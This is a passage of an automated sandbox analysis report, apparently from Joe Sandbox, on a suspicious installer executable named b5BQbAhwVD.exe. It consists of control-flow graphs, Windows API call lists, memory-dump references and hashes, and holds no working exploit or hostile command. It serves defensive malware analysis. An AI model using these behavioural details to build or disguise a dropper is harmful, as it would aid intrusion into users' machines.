                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss456A.tmp$C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll$Call
                                                                                                                  • API String ID: 1941528284-819274238
                                                                                                                  • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                  • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                  • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                  • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->713 723 4026c4-4026c9 720->723 721->722 724 40273c-402747 call 405fbf 721->724 722->713 732 40275f 722->732 723->713 726 4026cf-4026dd 723->726 724->713 724->722 727 4026e3-4026f5 MultiByteToWideChar 726->727 728 402798-4027a4 call 40632f 726->728 731 4026f7-4026fa 727->731 727->732 728->709 735 4026fc-402707 731->735 737 402762-402765 732->737 735->737 738 402709-40272e SetFilePointer MultiByteToWideChar 735->738 737->728 739 402767-40276c 737->739 738->735 742 402730 738->742 740 4027a9-4027ad 739->740 741 40276e-402773 739->741 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->732 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                    • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                  • String ID: 9
                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                  • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                  • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                  • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                  • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                  • wsprintfW.USER32 ref: 004067A4
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                  • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                  • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                  • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                  • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 757 405f0d-405f19 758 405f1a-405f4e GetTickCount GetTempFileNameW 757->758 759 405f50-405f52 758->759 760 405f5d-405f5f 758->760 759->758 761 405f54 759->761 762 405f57-405f5a 760->762 761->762
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\b5BQbAhwVD.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF), ref: 00405F46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                  • String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                  • API String ID: 1716503409-4195642894
                                                                                                                  • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                  • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                  • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                  • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 763 72ed1777-72ed17b6 call 72ed1b5f 767 72ed17bc-72ed17c0 763->767 768 72ed18d6-72ed18d8 763->768 769 72ed17c9-72ed17d6 call 72ed2394 767->769 770 72ed17c2-72ed17c8 call 72ed2352 767->770 775 72ed17d8-72ed17dd 769->775 776 72ed1806-72ed180d 769->776 770->769 779 72ed17df-72ed17e0 775->779 780 72ed17f8-72ed17fb 775->780 777 72ed182d-72ed1831 776->777 778 72ed180f-72ed182b call 72ed2569 call 72ed15b4 call 72ed1272 GlobalFree 776->778 783 72ed187e-72ed1884 call 72ed2569 777->783 784 72ed1833-72ed187c call 72ed15c6 call 72ed2569 777->784 804 72ed1885-72ed1889 778->804 781 72ed17e8-72ed17e9 call 72ed2aac 779->781 782 72ed17e2-72ed17e3 779->782 780->776 785 72ed17fd-72ed17fe call 72ed2d37 780->785 795 72ed17ee 781->795 788 72ed17e5-72ed17e6 782->788 789 72ed17f0-72ed17f6 call 72ed2724 782->789 783->804 784->804 798 72ed1803 785->798 788->776 788->781 803 72ed1805 789->803 795->798 798->803 803->776 807 72ed188b-72ed1899 call 72ed252c 804->807 808 72ed18c6-72ed18cd 804->808 813 72ed189b-72ed189e 807->813 814 72ed18b1-72ed18b8 807->814 808->768 811 72ed18cf-72ed18d0 GlobalFree 808->811 811->768 813->814 815 72ed18a0-72ed18a8 813->815 814->808 816 72ed18ba-72ed18c5 call 72ed153d 814->816 815->814 817 72ed18aa-72ed18ab FreeLibrary 815->817 816->808 817->814
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 72ED1B5F: GlobalFree.KERNEL32(?), ref: 72ED1DB2
                                                                                                                    • Part of subcall function 72ED1B5F: GlobalFree.KERNEL32(?), ref: 72ED1DB7
                                                                                                                    • Part of subcall function 72ED1B5F: GlobalFree.KERNEL32(?), ref: 72ED1DBC
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED1825
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 72ED18AB
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED18D0
                                                                                                                    • Part of subcall function 72ED2352: GlobalAlloc.KERNEL32(00000040,?), ref: 72ED2383
                                                                                                                    • Part of subcall function 72ED2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72ED17F6,00000000), ref: 72ED27F4
                                                                                                                    • Part of subcall function 72ED15C6: wsprintfW.USER32 ref: 72ED15F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3962662361-3916222277
                                                                                                                  • Opcode ID: d9fe8ec263ec1a72d23dab9a3e1001713afcbb85ed373307bf320e5928c9d8ae
                                                                                                                  • Instruction ID: 9839b8f5ac4e54819e32cd94d85df1e593f34936f48a5d6b80375beafa0162ea
                                                                                                                  • Opcode Fuzzy Hash: d9fe8ec263ec1a72d23dab9a3e1001713afcbb85ed373307bf320e5928c9d8ae
                                                                                                                  • Instruction Fuzzy Hash: 0441DF7A5402059BDB11DF7CE984B8E3BACBF05319F54E469F90B9E186DBB88087C760

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 820 402032-40203e 821 402044-40205a call 402c41 * 2 820->821 822 4020fd-4020ff 820->822 833 40206a-402079 LoadLibraryExW 821->833 834 40205c-402068 GetModuleHandleW 821->834 824 40224b-402250 call 401423 822->824 830 402ac5-402ad4 824->830 831 40288b-402892 824->831 831->830 836 40207b-40208a call 406831 833->836 837 4020f6-4020f8 833->837 834->833 834->836 840 4020c5-4020ca call 405450 836->840 841 40208c-402092 836->841 837->824 845 4020cf-4020d2 840->845 843 402094-4020a0 call 401423 841->843 844 4020ab-4020be call 72ed1777 841->844 843->845 853 4020a2-4020a9 843->853 847 4020c0-4020c3 844->847 845->830 848 4020d8-4020e2 call 403a78 845->848 847->845 848->830 854 4020e8-4020f1 FreeLibrary 848->854 853->845 854->830
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                  • String ID: n
                                                                                                                  • API String ID: 334405425-3033804873
                                                                                                                  • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                  • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                                  • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                  • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 856 4023e4-402415 call 402c41 * 2 call 402cd1 863 402ac5-402ad4 856->863 864 40241b-402425 856->864 866 402427-402434 call 402c41 lstrlenW 864->866 867 402438-40243b 864->867 866->867 870 40243d-40244e call 402c1f 867->870 871 40244f-402452 867->871 870->871 874 402463-402477 RegSetValueExW 871->874 875 402454-40245e call 4031d6 871->875 878 402479 874->878 879 40247c-40255d RegCloseKey 874->879 875->874 878->879 879->863 881 40288b-402892 879->881 881->863
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss456A.tmp
                                                                                                                  • API String ID: 2655323295-3623931551
                                                                                                                  • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                  • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                                  • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                  • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 882 401b77-401b82 883 401b84-401b87 882->883 884 401bc8-401bcb 882->884 887 4022e4-4022fc call 40640a call 405a4e 883->887 888 401b8d-401b91 883->888 885 401bf2-401c08 GlobalAlloc call 40640a 884->885 886 401bcd-401bcf 884->886 896 401c0d-401c1a 885->896 889 401bd5-401bed call 4063e8 GlobalFree 886->889 890 40288b-402892 886->890 903 402ad0-402ad4 887->903 888->883 893 401b93-401b95 888->893 894 402ac5-402ace 889->894 890->894 893->887 898 401b9b-4029e6 call 4063e8 * 3 893->898 894->903 896->887 896->894 898->894
                                                                                                                  APIs
                                                                                                                  • GlobalFree.KERNEL32(006E0AE8), ref: 00401BE7
                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree
                                                                                                                  • String ID: Call$n
                                                                                                                  • API String ID: 3394109436-4169552419
                                                                                                                  • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                                  • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                                  • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                                  • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$Enum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 464197530-0
                                                                                                                  • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                  • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                  • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                  • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                  • GetLastError.KERNEL32 ref: 00405976
                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                  • GetLastError.KERNEL32 ref: 00405995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3449924974-0
                                                                                                                  • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                  • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                  • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                  • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                    • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                  Strings
